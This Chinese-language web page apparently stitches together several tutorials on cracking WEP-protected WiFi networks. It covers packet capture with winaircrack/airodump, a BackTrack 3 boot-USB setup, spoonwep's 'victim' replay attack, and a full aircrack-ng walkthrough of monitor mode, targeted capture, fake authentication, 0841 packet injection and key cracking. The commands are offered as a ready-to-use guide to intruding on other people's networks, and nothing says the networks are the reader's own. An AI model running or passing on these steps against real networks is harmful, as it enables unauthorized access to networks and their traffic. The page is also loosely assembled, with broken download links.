首先打开ariodump.exe程序，按照下述操作：首先程序会提示本机目前存在的所有无线网卡接口，并要求你输入需要捕捉数据帧的无线网卡接口编号，在这里我选择使用支持通用驱动的BUFFALO WNIC---编号‘26’；然后程序要求你输入该WNIC的芯片类型，目前大多国际通用芯片都是使用‘HermesI/Realtek’子集的，因此选择‘o’；然后需要输入要捕捉的信号所处的频道，我们需要捕捉的AP所处的频道为‘6’；提示输入捕捉数据帧后存在的文件名及其位置，若不写绝对路径则文件默认存在在winaircrack的安装目录下，以.cap结尾，我在上例中使用的是‘last’；最后winaircrack提示：‘是否只写入/记录IV[初始化向量]到cap文件中去？’，我在这里选择‘否/n’；确定以上步骤后程序开始捕捉数据包。

用BT3入侵无线WEP快速上手指南1、一定要从U盘或光盘引导进入BT3(一定不要在vmware中启动BT3)，选第四项进入文字模式,startx,在/pentest/wireless目录下面存放着工具2、airmon //查看网卡的监控状态airmon-ng start wlan0 //启动指定的无线网卡airodump-ng -w 123 eth0 //一般不需要执行ifconfig //查看网卡有没有启动3、首先要设置网卡，输入“spoondrv”，然后点那个“Show Loaded”会显示出目前加载的网卡驱动:比如我的无线网卡驱动为: 35 Realtek 81874、spoonwep //进入图形模式依次选:wlan0/normal/unknown victim最好先执行AP扫描操作，如果能扫描到AP接入点说明成功选"P0841 REPLAY ATTACK"在Victim MAC 后输入要破解的AP的BSSID5、将获得的密钥填入“网络密钥”栏中，要记住不是密码栏中一、先开始制作启动U盘：将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘（1G以上容量）。

把Boot 和BT3两个文件夹放到U盘的根目录，打开BOOT文件夹双击运行" bootinst.bat "批处理文件。

U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" （如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。

下载地址：/cn/docs/listallfiles.do 提取密码：4871454552251231。

（用的是免费的网络硬盘,广告较多,有些朋友可能没认真看没找到，我说下大概位置，输入提取码后,拉到中间找下面的几个字(红色的) 以下这三个链接后两个均可下载推荐快车（flashget）高速下载文件下载文件(IE浏览器) 下载文件(非IE浏览器)）把压缩包里的"中文包"解压出来，将里面的*.lzm文件拷贝到u盘的BT3\modules目录，即可实现bt3中文化。

aircrack-ng详细教程/download.php?id=529&ResourceID=313教程：1、启动无线网卡的监控模式，在终端中输入：sudo airmon-ng start wlan0 （wlan0是无线网卡的端口,可在终端中输入ifconfig 查看）2、查看无线AP在终端中输入：sudo airodump-ng mon0（特别说明：启动监控模式后无线网的端口现在是mon0 ！！！）看看有哪些采用wep加密的AP在线，然后按ctrl+c 退出，保留终端3、抓包另开一个终端，输入：sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0(-c 后面跟着的6是要破解的AP工作频道，--bissid后面跟着的AP'sMAC是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地址，DATA保存的文件名可随便命名）4、与AP建立虚拟连接再另开一个终端，输入：sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0（-h后面跟着的My MAC是自己的无线网卡的MAC地址，命令：iwlist wlan0 scanning可查看自己的MAC地址；自己的MAC 地址为ifconfig命令下wlan0对应的mac 地址)5、进行注入成功建立虚拟连接后输入：sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 现在回头看下步骤3的终端是不是DATA在开始飞涨！（那串ff照抄就行）6、解密收集有15000个以上的DATA之后，另开一个终端，输入：sudo aircrack-ng wep*.cap进行解密（如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多15000个之后就自动再运行，直到算出密码为至，注意此处文件的名字要与步骤3里面设置的名字一样，且*号是必需的）7、收工破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。